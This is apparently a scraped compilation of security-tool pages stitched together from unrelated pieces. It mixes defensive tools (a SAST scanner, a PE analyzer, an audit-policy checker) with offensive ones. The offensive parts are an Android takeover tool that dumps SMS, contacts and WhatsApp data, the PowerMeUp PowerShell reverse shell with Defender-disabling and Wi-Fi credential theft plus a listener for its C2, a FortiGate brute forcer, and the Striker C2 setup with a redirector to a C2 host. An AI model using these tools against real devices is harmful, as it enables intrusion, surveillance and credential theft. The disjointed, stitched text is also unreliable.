https://docs.bearer.com/reference/rules/ruby_lang_insecure_ftp

File: bear-publishing/app/services/marketing_export.rb:34

34 Net::FTP.open(
35 'marketing.example.com',
36 'marketing',
37 'password123'
...
41 end


=====================================

56 checks, 10 failures, 6 warnings

CRITICAL: 7
HIGH: 0
MEDIUM: 0
LOW: 3
WARNING: 6

The security report is just one report type available in Bearer.

Additional options for using and configuring the scan command can be found in the scan documentation.

For additional guides and usage tips, view the docs.

FAQs

How do you detect sensitive data flows from the code?

When you run Bearer on your codebase, it discovers and classifies data by identifying patterns in the source code. Specifically, it looks for data types and matches against them. Most importantly, it never views the actual values (it just can't), only the code itself.

Bearer assesses 120+ data types from sensitive data categories such as Personal Data (PD), Sensitive PD, Personally identifiable information (PII), and Personal Health Information (PHI). You can view the full list in the supported data types documentation.

In a nutshell, our static code analysis is performed on two levels:

  • Analyzing class names, methods, functions, variables, properties, and attributes. It then ties those together into detected data structures and performs variable reconciliation, etc.
  • Analyzing data structure definition files such as OpenAPI, SQL, GraphQL, and Protobuf.

Bearer then passes this over to the classification engine we built to support this very particular discovery process.

If you want to learn more, here is the longer explanation.

When and where to use Bearer?

We recommend running Bearer in your CI to check new PRs automatically for security issues, so your development team has a direct feedback loop to fix issues immediately.

You can also integrate Bearer in your CD, though we recommend making it fail only on high-criticality issues, as the impact on your organization might be significant.

In addition, running Bearer on a scheduled job is a great way to keep track of your security posture and make sure new security issues are found even in projects with low activity.

Supported Languages

Bearer currently supports JavaScript and Ruby, along with their most used frameworks and libraries. More languages will follow.

What makes Bearer different from any other SAST tools?

SAST tools are known to bury security teams and developers under hundreds of issues with little context and no sense of priority, often requiring security analysts to triage issues. Not Bearer.

The most vulnerable asset today is sensitive data, so we start there and prioritize application security risks and vulnerabilities by assessing sensitive data flows in your code to highlight what is urgent, and what is not.

We believe that by linking security issues with a clear business impact and risk of a data breach, or data leak, we can build better and more robust software, at no extra cost.

In addition, by being Open Source, extendable by design, and built with a great developer UX in mind, we bet you will see the difference for yourself.

How long does it take to scan my code? Is it fast?

It depends on the size of your applications. It can take as little as 20 seconds, up to a few minutes for an extremely large code base. Weโ€™ve added an internal caching layer that only looks at delta changes to allow quick, subsequent scans.

Running Bearer should not take more time than running your test suite.

What about false positives?

If youโ€™re familiar with other SAST tools, false positives are always a possibility.

By using the most modern static code analysis techniques and providing a native filtering and prioritizing solution on the most important issues, we believe this problem wonโ€™t be a concern when using Bearer.

Get in touch

Thanks for using Bearer. Still have questions?

Contributing

Interested in contributing? We're here for it! For details on how to contribute, setting up your development environment, and our processes, review the contribution guide.

Code of conduct

Everyone interacting with this project is expected to follow the guidelines of our code of conduct.

Security

To report a vulnerability or suspected vulnerability, see our security policy. For any questions, concerns or other security matters, feel free to open an issue or join the Discord Community.



MIMEDefang Email Scanner 3.4

MIMEDefang is a flexible MIME email scanner designed to protect Windows clients from viruses. Includes the ability to do many other kinds of mail processing, such as replacing parts of messages with URLs. It can alter or delete various parts of a MIME message according to a very flexible configuration file. It can also bounce messages with unacceptable attachments. MIMEDefang works with the Sendmail 8.11 and newer "Milter" API, which makes it more flexible and efficient than procmail-based approaches.

PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


An all-in-one hacking tool written in Python to remotely exploit Android devices using ADB (Android Debug Bridge) and Metasploit-Framework.

Complete Automation to get a Meterpreter session in One Click

This tool can automatically Create, Install, and Run payload on the target device using Metasploit-Framework and ADB to completely hack the Android Device in one click.

The goal of this project is to make penetration testing on Android devices easy. Now you don't have to learn commands and arguments, PhoneSploit Pro does it for you. Using this tool, you can test the security of your Android devices easily.

PhoneSploit Pro can also be used as a complete ADB Toolkit to perform various operations on Android devices over Wi-Fi as well as USB.

ย 

Features

v1.0

  • Connect device using ADB remotely.
  • List connected devices.
  • Disconnect all devices.
  • Access connected device shell.
  • Stop ADB Server.
  • Take screenshot and pull it to computer automatically.
  • Screen Record target device screen for a specified time and automatically pull it to computer.
  • Download file/folder from target device.
  • Send file/folder from computer to target device.
  • Run an app.
  • Install an APK file from computer to target device.
  • Uninstall an app.
  • List all installed apps in target device.
  • Restart/Reboot the target device to System, Recovery, Bootloader, Fastboot.
  • Hack Device Completely :
    • Automatically fetch your IP Address to set LHOST.
    • Automatically create a payload using msfvenom, install it, and run it on target device.
    • Then automatically launch and setup Metasploit-Framework to get a meterpreter session.
    • Getting a meterpreter session means the device is completely hacked using Metasploit-Framework, and you can do anything with it.

v1.1

  • List all files and folders of the target devices.
  • Copy all WhatsApp Data to computer.
  • Copy all Screenshots to computer.
  • Copy all Camera Photos to computer.
  • Take screenshots and screen-record anonymously (Automatically delete file from target device).
  • Open a link on target device.
  • Display an image/photo on target device.
  • Play an audio on target device.
  • Play a video on target device.
  • Get device information.
  • Get battery information.
  • Use Keycodes to control device remotely.

v1.2

  • Send SMS through target device.
  • Unlock device (Automatic screen on, swipe up and password input).
  • Lock device.
  • Dump all SMS from device to computer.
  • Dump all Contacts from device to computer.
  • Dump all Call Logs from device to computer.
  • Extract APK from an installed app.

v1.3

  • Mirror and Control the target device.

v1.4

  • Power off the target device.

Requirements

Run PhoneSploit Pro

PhoneSploit Pro does not need any installation and runs directly using python3.

On Linux / macOS :

Make sure all the required software is installed.

Open terminal and paste the following commands :

git clone https://github.com/AzeemIdrisi/PhoneSploit-Pro.git
cd PhoneSploit-Pro/
python3 phonesploitpro.py

On Windows :

Make sure all the required software is installed.

Open terminal and paste the following commands :

git clone https://github.com/AzeemIdrisi/PhoneSploit-Pro.git
cd PhoneSploit-Pro/
  1. Download and extract latest platform-tools from here.

  2. Copy all files from the extracted platform-tools or adb directory to PhoneSploit-Pro directory and then run :

python phonesploitpro.py

Screenshots

Installing ADB

ADB on Linux :

Open terminal and paste the following commands :

  • Debian / Ubuntu
sudo apt update
sudo apt install adb
  • Fedora
sudo dnf install adb
  • Arch Linux / Manjaro
sudo pacman -Sy android-tools

For other Linux Distributions : Visit this Link

ADB on macOS :

Open terminal and paste the following command :

brew install android-platform-tools

or Visit this link : Click Here

ADB on Windows :

Visit this link : Click Here

ADB on Termux :

pkg update
pkg install android-tools

Installing Metasploit-Framework

On Linux / macOS :

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall

or Follow this link : Click Here

or Visit this link : Click Here

On Windows :

Visit this link : Click Here

or Follow this link : Click Here

Installing scrcpy

Visit the scrcpy GitHub page for latest installation instructions : Click Here

On Windows : Copy all the files from the extracted scrcpy folder to PhoneSploit-Pro folder.

If scrcpy is not available for your Linux distro, then you can build it with a few simple steps : Build Guide

Tutorial

Setting up Android Phone for the first time

  • Enabling the Developer Options
  1. Open Settings.
  2. Go to About Phone.
  3. Find Build Number.
  4. Tap on Build Number 7 times.
  5. Enter your pattern, PIN or password to enable the Developer options menu.
  6. The Developer options menu will now appear in your Settings menu.
  • Enabling USB Debugging
  1. Open Settings.
  2. Go to System > Developer options.
  3. Scroll down and Enable USB debugging.
  • Connecting with Computer
  1. Connect your Android device and adb host computer to a common Wi-Fi network.
  2. Connect the device to the host computer with a USB cable.
  3. Open terminal in the computer and enter the following command :
adb devices
  4. A pop-up will appear in the Android phone when you connect your phone to a new PC for the first time : Allow USB debugging?.
  5. Click on Always allow from this computer check-box and then click Allow.
  6. Then enter the following command :
adb tcpip 5555
  7. Now you can connect the Android Phone over Wi-Fi.
  8. Disconnect the USB cable.
  9. Go to Settings > About Phone > Status > IP address and note the phone's IP Address.
  10. Run PhoneSploit Pro and select Connect a device and enter the target's IP Address to connect over Wi-Fi (a minimal scripted version of these steps is sketched below).
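
As a rough sketch of what PhoneSploit Pro automates here, the same flow can be scripted around the adb binary; the target IP is a placeholder:

import subprocess

def adb(*args):
    # Shell out to adb and return its stdout.
    return subprocess.run(["adb", *args], capture_output=True, text=True).stdout

print(adb("tcpip", "5555"))                # restart adbd in TCP mode (USB still attached)
print(adb("connect", "192.168.1.5:5555"))  # then connect over Wi-Fi
print(adb("devices"))                      # verify the device is listed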

Connecting the Android phone for the next time

  1. Connect your Android device and host computer to a common Wi-Fi network.
  2. Run PhoneSploit Pro and select Connect a device and enter the target's IP Address to connect over Wi-Fi.

This tool is tested on

  • โœ…Ubuntu
  • โœ…Linux Mint
  • โœ…Kali Linux
  • โœ…Fedora
  • โœ…Arch Linux
  • โœ…Parrot Security OS
  • โœ…Windows 11
  • โœ…Termux (Android)

All the new features are primarily tested on Linux, thus Linux is recommended for running PhoneSploit Pro. Some features might not work properly on Windows.

Disclaimer

  • Neither the project nor its developer promote any kind of illegal activity and are not responsible for any misuse or damage caused by this project.
  • This project is for the purpose of penetration testing only.
  • Please do not use this tool on other people's devices without their permission.
  • Do not use this tool to harm others.
  • Use this project responsibly on your own devices only.
  • It is the end user's responsibility to obey all applicable local, state, federal, and international laws.


PortEx - Java Library To Analyse Portable Executable Files With A Special Focus On Malware Analysis And PE Malformation Robustness


PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness, and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.

Features

  • Reading header information from: MSDOS Header, COFF File Header, Optional Header, Section Table
  • Reading PE structures: Imports, Resources, Exports, Debug Directory, Relocations, Delay Load Imports, Bound Imports
  • Dumping of sections, resources, overlay, embedded ZIP, JAR or .class files
  • Scanning for file format anomalies, including structural anomalies, deprecated, reserved, wrong or non-default values.
  • Visualize PE file structure, local entropies and byteplot of the file with variable colors and sizes
  • Calculate Shannon Entropy and Chi Squared for files and sections
  • Calculate ImpHash and Rich and RichPV hash values for files and sections
  • Parse RichHeader and verify checksum
  • Calculate and verify Optional Header checksum
  • Scan for PEiD signatures, internal file type signatures or your own signature database
  • Scan for Jar to EXE wrapper (e.g. exe4j, jsmooth, jar2exe, launch4j)
  • Extract Unicode and ASCII strings contained in the file
  • Extraction and conversion of .ICO files from icons in the resource section
  • Extraction of version information and manifest from the file
  • Reading .NET metadata and streams (Alpha)

For more information have a look at PortEx Wiki and the Documentation

PortexAnalyzer CLI and GUI

PortexAnalyzer CLI is a command line tool that runs the library PortEx under the hood. If you are looking for a readily compiled command line PE scanner to analyse files with, you can download it here: PortexAnalyzer.jar

The GUI version is available here: PortexAnalyzerGUI

Using PortEx

Including PortEx to a Maven Project

You can include PortEx to your project by adding the following Maven dependency:

<dependency>
  <groupId>com.github.katjahahn</groupId>
  <artifactId>portex_2.12</artifactId>
  <version>4.0.0</version>
</dependency>

To use a local build, add the library as follows:

<dependency>
  <groupId>com.github.katjahahn</groupId>
  <artifactId>portex_2.12</artifactId>
  <version>4.0.0</version>
  <scope>system</scope>
  <systemPath>$PORTEXDIR/target/scala-2.12/portex_2.12-4.0.0.jar</systemPath>
</dependency>

Including PortEx to an SBT project

Add the dependency as follows in your build.sbt

libraryDependencies += "com.github.katjahahn" % "portex_2.12" % "4.0.0"

Building PortEx

Requirements

PortEx is built with sbt.

Compile and Build With sbt

To simply compile the project invoke:

$ sbt compile

To create a jar:

$ sbt package

To compile a fat jar that can be used as command line tool, type:

$ sbt assembly

Create Eclipse Project

You can create an eclipse project by using the sbteclipse plugin. Add the following line to project/plugins.sbt:

addSbtPlugin("com.typesafe.sbteclipse" % "sbteclipse-plugin" % "2.4.0")

Generate the project files for Eclipse:

$ sbt eclipse

Import the project to Eclipse via the Import Wizard.

Donations

I develop PortEx and PortexAnalyzer as a hobby in my freetime. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

Author

Karsten Hahn

Twitter: @Struppigel

Mastodon: struppigel@infosec.exchange

Youtube: MalwareAnalysisForHedgehogs



auditpolCIS - CIS Benchmark Testing Of Windows SIEM Configuration


CIS Benchmark testing of Windows SIEM configuration

This is an application for testing the configuration of Windows Audit Policy settings against the CIS Benchmark recommended settings. A few points:

  • The tested system was Windows Server 2019, and the benchmark used was also Windows Server 2019.
  • The script connects with SSH. SSH is included with Windows Server 2019, it just has to be enabled. If you would like to see WinRM (or other) connection types, let me know or send a PR.
  • Some tests are included here which were not included in the CIS guide. The recommended settings for these Subcategories are based on the logging volume for these events, versus the security value. In nearly all cases, the recommendation is to turn off auditing for these settings.
  • The YAML file cis-benchmarks.yaml is the YAML representation of the CIS Benchmark guideline for each Subcategory.
  • The command run under SSH is auditpol /get /category:*
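
A hedged sketch of the comparison this performs, assuming cis-benchmarks.yaml maps Subcategory names to recommended settings (the real file layout may nest differently, and the output file below is a placeholder for captured `auditpol /get /category:*` output):

import re
import yaml  # pip install pyyaml

def parse_auditpol(output):
    # Subcategory lines look like: "  Logon                 Success and Failure"
    settings = {}
    for line in output.splitlines():
        m = re.match(r"\s{2}(\S.*?)\s{2,}(\S.*)$", line)
        if m:
            settings[m.group(1).strip()] = m.group(2).strip()
    return settings

benchmark = yaml.safe_load(open("cis-benchmarks.yaml"))
actual = parse_auditpol(open("auditpol-output.txt").read())
for subcategory, recommended in benchmark.items():
    got = actual.get(subcategory)
    print(subcategory, "PASS" if got == recommended else "FAIL (got: %s)" % got)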


Further details on usage and other background info is at https://www.seven-stones.biz/blog/auditpolcis-automating-windows-siem-cis-benchmarks-testing/



KubeStalk - Discovers Kubernetes And Related Infrastructure Based Attack Surface From A Black-Box Perspective

ย 


KubeStalk is a tool to discover Kubernetes and related infrastructure based attack surface from a black-box perspective. This tool is a community version of the tool used to probe for unsecured Kubernetes clusters around the internet during Project Resonance - Wave 9.


Usage

The GIF below demonstrates usage of the tool:


Installation

KubeStalk is written in Python and requires the requests library.

To install the tool, you can clone the repository to any directory:

git clone https://github.com/redhuntlabs/kubestalk

Once cloned, you need to install the requests library using python3 -m pip install requests or:

python3 -m pip install -r requirements.txt

Everything is now set up and you can use the tool directly.

Command-line Arguments

A list of command line arguments supported by the tool can be displayed using the -h flag.

$ python3 kubestalk.py  -h

+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1

[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

usage: ./kubestalk.py <url(s)>/<cidr>

Required Arguments:
urls List of hosts to scan

Optional Arguments:
-o OUTPUT, --output OUTPUT
Output path to write the CSV file to
-f SIG_FILE, --sig-dir SIG_FILE
Signature directory path to load
-t TIMEOUT, --timeout TIMEOUT
HTTP timeout value in seconds
-ua USER_AGENT, --user-agent USER_AGENT
User agent header to set in HTTP requests
--concurrency CONCURRENCY
No. of hosts to process simultaneously
--verify-ssl Verify SSL certificates
--version Display the version of KubeStalk and exit.

Basic Usage

To use the tool, you can pass one or more hosts to the script. All targets passed to the tool must be RFC 3986 compliant, i.e. must contain a scheme and hostname (and port if required).

A basic usage is as below:

$ python3 kubestalk.py https://โ–ˆโ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆโ–ˆ:10250

+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1

[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

[+] Loaded 10 signatures to scan.
[*] Processing host: https://โ–ˆโ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ:10250
[!] Found potential issue on https://โ–ˆโ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ:10250: Kubernetes Pod List Exposure
[*] Writing results to output file.
[+] Done.

HTTP Tuning

HTTP requests can be fine-tuned using the -t (to set HTTP timeouts), -ua (to specify custom user agents), and --verify-ssl (to validate SSL certificates while making requests) flags.

Concurrency

You can control the number of hosts to scan simultaneously using the --concurrency flag. The default value is set to 5.

Output

The output is written to a CSV file, and the output path can be controlled by the --output flag.

A sample of the CSV output rendered in markdown is as below:

| host | path | issue | type | severity |
|------|------|-------|------|----------|
| https://█.█.█.█:10250 | /pods | Kubernetes Pod List Exposure | core-component | vulnerability/misconfiguration |
| https://█.█.█.█:443 | /api/v1/pods | Kubernetes Pod List Exposure | core-component | vulnerability/misconfiguration |
| http://█.█.██.█:80 | / | etcd Viewer Dashboard Exposure | add-on | vulnerability/exposure |
| http://██.██.█.█:80 | / | cAdvisor Metrics Web UI Dashboard Exposure | add-on | vulnerability/exposure |
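
The probing loop itself is straightforward to sketch: request well-known paths on each host and match simple response signatures. The paths and match rules below are illustrative, not KubeStalk's actual signature set:

import requests

SIGNATURES = [
    ("/pods", "Kubernetes Pod List Exposure", '"items"'),
    ("/metrics", "Metrics Endpoint Exposure", "# HELP"),
]

def probe(base_url):
    for path, issue, marker in SIGNATURES:
        try:
            r = requests.get(base_url + path, timeout=5, verify=False)
        except requests.RequestException:
            continue
        if r.status_code == 200 and marker in r.text:
            print("[!] %s%s: %s" % (base_url, path, issue))

probe("https://10.0.0.1:10250")  # placeholder target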

Version & License

The tool is licensed under the BSD 3 Clause License and is currently at v0.1.

To know more about our Attack Surface Management platform, check out NVADR.



Nuclearpond - A Utility Leveraging Nuclei To Perform Internet Wide Scans For The Cost Of A Cup Of Coffee


Nuclear Pond is used to leverage Nuclei in the cloud with remarkable speed and flexibility, and to perform internet-wide scans for far less than the cost of a cup of coffee.

It leverages AWS Lambda as a backend to invoke Nuclei scans in parallel, offers the choice of storing JSON findings in S3 to query with AWS Athena, and is easily one of the cheapest ways you can execute scans in the cloud.


Features

  • Output results to your terminal, json, or to S3
  • Specify threads and parallel invocations in any desired number of batches
  • Specify any Nuclei arguments just like you would locally
  • Specify a single host or from a file
  • Run the http server to take scans from the API
  • Run the http server to get status of the scans
  • Query findings through Athena for searching S3
  • Specify a custom nuclei and reporting configurations

Usage

Think of Nuclear Pond as just a way for you to run Nuclei in the cloud. You can use it just as you would on your local machine but run them in parallel and with however many hosts you want to specify. All you need to think of is the nuclei command line flags you wish to pass to it.

Setup & Installation

To install Nuclear Pond, you need to configure the backend terraform module. You can do this by running terraform apply or by leveraging terragrunt.

$ go install github.com/DevSecOpsDocs/nuclearpond@latest

Environment Variables

You can either pass in your backend with flags or through environment variables. You can use -f or --function-name to specify your Lambda function and -r or --region to the specified region. Below are environment variables you can use.

  • AWS_LAMBDA_FUNCTION_NAME is the name of your lambda function to execute the scans on
  • AWS_REGION is the region your resources are deployed
  • NUCLEARPOND_API_KEY is the API key for authenticating to the API
  • AWS_DYNAMODB_TABLE is the dynamodb table to store API scan states

Command line flags

Below are some of the flags you can specify when running nuclearpond. The primary flags you need are -t or -l for your target(s), -a for the nuclei args, and -o to specify your output. When specifying Nuclei args you must pass them in as base64 encoded strings by performing -a $(echo -ne "-t dns" | base64).
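
For a sense of what happens under the hood, here is a hedged Python sketch of the same pattern with boto3: base64-encode the nuclei args and invoke the Lambda function asynchronously. The payload layout and function name are assumptions for illustration, not Nuclear Pond's actual schema:

import base64, json
import boto3

args = base64.b64encode(b"-t dns").decode()
payload = {"Targets": ["devsecopsdocs.com"], "Args": args, "Output": "cmd"}  # assumed shape

client = boto3.client("lambda", region_name="us-east-1")
client.invoke(
    FunctionName="your-nuclei-runner-function",  # placeholder
    InvocationType="Event",  # asynchronous invocation, as nuclearpond does
    Payload=json.dumps(payload),
)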

Commands

Below are the subcommands you can execute within nuclearpond.

  • run: Execute nuclei scans
  • service: Basic API to execute nuclei scans

Run

An example of the run subcommand: nuclearpond run -t devsecopsdocs.com -r us-east-1 -f jwalker-nuclei-runner-function -a $(echo -ne "-t dns" | base64) -o cmd -b 1, in which the target is devsecopsdocs.com, the region is us-east-1, the lambda function name is jwalker-nuclei-runner-function, the nuclei arguments are -t dns, the output is cmd, and one function is executed with a batch of one host through -b 1.

$ nuclearpond run -h
Executes nuclei tasks in parallel by invoking lambda asynchronously

Usage:
nuclearpond run [flags]

Flags:
-a, --args string nuclei arguments as base64 encoded string
-b, --batch-size int batch size for number of targets per execution (default 1)
-f, --function-name string AWS Lambda function name
-h, --help help for run
-o, --output string output type to save nuclei results(s3, cmd, or json) (default "cmd")
-r, --region string AWS region to run nuclei
-s, --silent silent command line output
-t, --target string individual target to specify
-l, --targets string list of targets in a file
-c, --threads int number of threads to run lambda functions, default is 1 which will be slow (default 1)

Custom Templates

The terraform module by default downloads the templates on execution as well as adds the templates as a layer. The variables to download templates use the terraform github provider to download the release zip. The folder name within the zip will be located within /opt. Since Nuclei downloads templates at runtime we do not have to, but to improve performance you can specify -t /opt/nuclei-templates-9.3.4/dns to execute templates from the downloaded zip. To specify your own templates you must reference a release. When doing so on your own repository you must specify these variables in the terraform module; github_token is not required if your repository is public.

  • github_repository
  • github_owner
  • release_tag
  • github_token

Retrieving Findings

If you have specified s3 as the output, your findings will be located in S3. The fastest way to get at them is to do so with Athena. Assuming you setup the terraform-module as your backend, all you need to do is query them directly through athena. You may have to configure query results if you have not done so already.

select
*
from
nuclei_db.findings_db
limit 10;

Advance Query

To dig a little deeper into queries, here is a quick example. In the select statement we drill down into the info column; the "matched-at" column must be in double quotes due to the - character; and we search only for high and critical findings generated by Nuclei.

SELECT
info.name,
host,
type,
info.severity,
"matched-at",
info.description,
template,
dt
FROM
"nuclei_db"."findings_db"
where
host like '%devsecopsdocs.com'
and info.severity in ('high','critical')

Infrastructure

The backend infrastructure lives entirely within the terraform module. I would strongly recommend reading the readme associated with it, as it has some important notes.

  • Lambda function
  • S3 bucket
    • Stores nuclei binary
    • Stores configuration files
    • Stores findings
  • Glue Database and Table
    • Allows you to query the findings in S3
    • Partitioned by the hour
    • Partition projection
  • IAM Role for Lambda Function


PowerMeUp - A Small Library Of Powershell Scripts For Post Exploitation That You May Need Or Use!


This is a PowerShell reverse shell that executes the commands and/or scripts you add to the powerreverse.ps1 file, as well as a small library of post-exploitation scripts. It can also be used for post exploitation and even lateral movement. Please use at your own risk; I am not and will not be responsible for your actions. Also, this reverse shell is currently not detected by Windows Defender. If you want to use this, make sure to set up a Digital Ocean VPS and have the script connect back there or to your C2. Happy Hacking!


Key Features

  • Reverse Shell
    • Simply Change The IP & Port & Let It Do Its Magic
  • Blue Screen Of Death (BSOD)
    • Basically calls wininit.exe to trigger a blue screen and shut down the computer
  • Disable Windows Defender (Needs Admin Priv Of Course)
  • Get Computer Information
  • Disable Input (Needs Admin Priv)
  • Disable Monitor
  • Exclude File Extensions (Needs Admin Priv)
  • Exclude Folder (Needs Admin Priv)
  • Exclude Process (Needs Admin Priv)
  • Get USB History
  • GPS Location (Gets The Lat & Long Then Performs A Reverse GEO Lookup & Spits Out The Exact Address)
  • Grab Wifi Credentials
  • Ifconfig
  • List Antivirus Running
  • List External IP
  • Logoff
  • Mayhem Window Popup
  • Send A Message Box
  • Network Scan (Internally Scans The Network For Open Ports & IPs)
  • Restart
  • Rickroll
  • Scare Window
  • Screenshot The Screen
  • System Time
  • Webcam List

How To Use

To run this application, you'll need the powerreverse.ps1 file executed on the target PC.

# Install This Repository
$ Download The Code By Pressing Download ZIP

# Clone this repository
$ git clone https://github.com/ItsCyberAli/PowerMeUp.git

# Take One Of The Functions & Copy-Paste It Into PowerReverse
$ The screenshot below shows the powerreverse.ps1 file with the BSOD.ps1 function
copy-pasted inside, so that we can call & use it when we execute on the target PC.
You can mix & match the features you want in the reverse shell; just make sure there are no references
right above the function call. If it says 0 references you are fine; if it says 1 or more, simply change
the function name. When the reverse shell executes and you want to run a specific feature, simply call
the function name (in our case, inside the VPS simply type bsod) and it will execute it, or whatever you
named the function!


# Change The LHOST & LPORT Inside Of The PowerReverse File
$LHOST = "YOUR C2 IP"
$LPORT = #Your Port Without Quotations

# Start A Netcat Listener Or Your Own Implementation Of A Listener On VPS Or C2 & Enjoy!
$ nc -l -p <port you chose> (Just A Netcat Listener In Your VPS Not Needed If You Use Another Method!)
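
If you would rather not rely on netcat, a bare-bones Python listener works the same way; it accepts one connection from the reverse shell and relays your commands. The port is a placeholder:

import socket, sys, threading

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("0.0.0.0", 4444))  # placeholder port
srv.listen(1)
print("[*] Listening on 0.0.0.0:4444 ...")
conn, addr = srv.accept()
print("[+] Connection from %s:%d" % addr)

def pump():
    # Print everything the shell sends back.
    while True:
        data = conn.recv(4096)
        if not data:
            break
        sys.stdout.write(data.decode(errors="replace"))
        sys.stdout.flush()

threading.Thread(target=pump, daemon=True).start()
for line in sys.stdin:  # type a function name, e.g. bsod
    conn.sendall(line.encode())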

Download

You can download the code from the top right, it will give you all the code needed in a ZIP file.

Reach Me Here

If you want to discuss any topics or need some help, I am very active and can get back to you within 24 hours or less, and we can set up a date & time to help with whatever it is you need. I am also open to collaborating on projects that I feel are worth my time and of interest to me as well!



FortiGate Brute Forcer

This python script is a slow brute forcing utility to check passwords against FortiGate appliances. Check the homepage link for more information on how this was used to slowly bypass brute force protections.

Striker - A Command And Control (C2)


Striker is a simple Command and Control (C2) program.


Disclaimer

This project is under active development. Most of the features are experimental, with more to come. Expect breaking changes.

Features

A) Agents

  • Native agents for Linux and Windows hosts.
  • Self-contained, minimal python agent should you ever need it.
  • HTTP(s) channels.
  • Asynchronous task execution.
  • Support for multiple redirectors, with fallback to others when the active one goes down.

B) Backend / Teamserver

  • Supports multiple operators.
  • Most features exposed through the REST API, making it easy to automate things.
  • Uses web sockets for faster comms.

C) User Interface

  • Smooth and reactive UI thanks to Svelte and SocketIO.
  • Easy to configure as it compiles into static HTML, JavaScript, and CSS files, which can be hosted with even the most basic web server you can find.
  • Teamchat feature to communicate with other operators over text.

Installing Striker

Clone the repo;

$ git clone https://github.com/4g3nt47/Striker.git
$ cd Striker

The codebase is divided into 4 independent sections;

1. The C2 Server / Backend

This handles all server-side logic for both operators and agents. It is a NodeJS application made with;

  • express - For the REST API.
  • socket.io - For Web Socket communication.
  • mongoose - For connecting to MongoDB.
  • multer - For handling file uploads.
  • bcrypt - For hashing user passwords.

The source code is in the backend/ directory. To setup the server;

  1. Setup a MongoDB database;

Striker uses MongoDB as its backend database to store all important data. You can install this locally on your machine using this guide for Debian-based distros, or create a free one with MongoDB Atlas (a database-as-a-service platform).

  2. Move into the source directory;
$ cd backend
  3. Install dependencies;
$ npm install
  4. Create a directory for static files;
$ mkdir static

You can use this folder to host static files on the server. This should also be where your UPLOAD_LOCATION is set to in the .env file (more on this later), but this is not necessary. Files in this directory will be publicly accessible under the path /static/.

  5. Create a .env file;

NOTE: Values between < and > are placeholders. Replace them with appropriate values (including the <>). For fields that require random strings, you can generate them easily using;

$ head -c 100 /dev/urandom | sha256sum
DB_URL=<your MongoDB connection URL>
HOST=<host to listen on (default: 127.0.0.1)>
PORT=<port to listen on (default: 3000)>
SECRET=<random string to use for signing session cookies and encrypting session data>
ORIGIN_URL=<full URL of the server you will be hosting the frontend at. Used to setup CORS>
REGISTRATION_KEY=<random string to use for authentication during signup>
MAX_UPLOAD_SIZE=<max file upload size, in bytes>
UPLOAD_LOCATION=<directory to store uploaded files to (default: static)>
SSL_KEY=<your SSL key file (optional)>
SSL_CERT=<your SSL cert file (optional)>

Note that SSL_KEY and SSL_CERT are optional. If either is not defined, a plain HTTP server will be created. This helps avoid needless overhead when running the server behind an SSL-enabled reverse proxy on the same host.

  6. Start the server;
$ node index.js
[12:45:30 PM] Connecting to backend database...
[12:45:31 PM] Starting HTTP server...
[12:45:31 PM] Server started on port: 3000

2. The Frontend

This is the web UI used by operators. It is a single page web application written in Svelte, and the source code is in the frontend/ directory.

To setup the frontend;

  1. Move into the source directory;
$ cd frontend
  2. Install dependencies;
$ npm install
  3. Create a .env file with the variable VITE_STRIKER_API set to the full URL of the C2 server as configured above;
VITE_STRIKER_API=https://c2.striker.local
  4. Build;
$ npm run build

The above will compile everything into a static web application in the dist/ directory. You can move all the files inside it into the web root of your web server, or even host it with a basic HTTP server like that of python;

$ cd dist
$ python3 -m http.server 8000
  5. Signup;
  • Open the site in a web browser. You should see a login page.
  • Click on the Register button.
  • Enter a username, password, and the registration key in use (see REGISTRATION_KEY in backend/.env)

This will create a standard user account. You will need an admin account to access some features. Your first admin account must be created manually; afterwards, you can upgrade and downgrade other accounts in the Users tab of the web UI.

To create your first admin account;

  • Connect to the MongoDB database used by the backend.
  • Update the users collection and set the admin field of the target user to true;

There are different ways you can do this. If you have mongo available in your CLI, you can do it using;

$ mongo <your MongoDB connection URL>
> db.users.updateOne({username: "<your username>"}, {$set: {admin: true}})

You should get the following response if it works;

{ "acknowledged" : true, "matchedCount" : 1, "modifiedCount" : 1 }

You can now login :)

3. The C2 Redirector

A) Dumb Pipe Redirection

A dumb pipe redirector written for Striker is available at redirector/redirector.py. Obviously, this will only work for plain HTTP traffic, or for HTTPS when SSL verification is disabled (you can do this by enabling the INSECURE_SSL macro in the C agent).

The following example listens on port 443 on all interfaces and forwards to c2.example.org on port 443;

$ cd redirector
$ ./redirector.py 0.0.0.0:443 c2.example.org:443
[*] Starting redirector on 0.0.0.0:443...
[+] Listening for connections...
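
For reference, a dumb pipe is nothing more than a bidirectional byte shuttle between the victim-facing port and the C2. A minimal sketch of the concept (this is not redirector.py itself):

# pipe.py - minimal dumb-pipe TCP redirector sketch (concept only;
# not redirector.py itself)
import socket
import threading

LISTEN = ("0.0.0.0", 443)
BACKEND = ("c2.example.org", 443)

def shuttle(src, dst):
    """Copy bytes from src to dst until either side closes."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        src.close()
        dst.close()

srv = socket.socket()
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(LISTEN)
srv.listen(5)
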